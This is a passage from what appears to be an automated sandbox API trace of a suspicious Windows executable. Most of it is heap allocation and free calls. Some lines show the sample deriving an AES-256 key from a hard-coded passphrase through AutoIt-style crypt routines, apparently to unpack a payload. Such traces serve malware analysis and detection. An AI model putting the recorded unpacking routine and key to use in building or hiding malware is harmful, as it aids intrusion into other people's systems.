hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.596] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.597] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.597] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0118.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0118.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0118.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0118.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0118.599] CloseHandle (hObject=0x258) returned 1 [0118.599] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.599] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0118.599] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca667c00, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xca667c00, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0x2e3c7500, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x11ec00, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="42F0.TMP.EXE.exe", cAlternateFileName="42F0TM~1.EXE")) returned 0x41ac500 [0118.600] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0118.600] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0118.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.612] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0118.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0118.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0118.612] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0118.614] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0118.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.614] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0118.614] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.614] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca8e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0118.614] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0118.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.615] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca790, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0118.615] CryptHashData (hHash=0x41ac600, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0118.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.615] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca958, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0118.615] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0118.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0118.615] CryptDestroyHash (hHash=0x41ac600) returned 1 [0118.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0118.616] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0118.617] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0118.617] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) 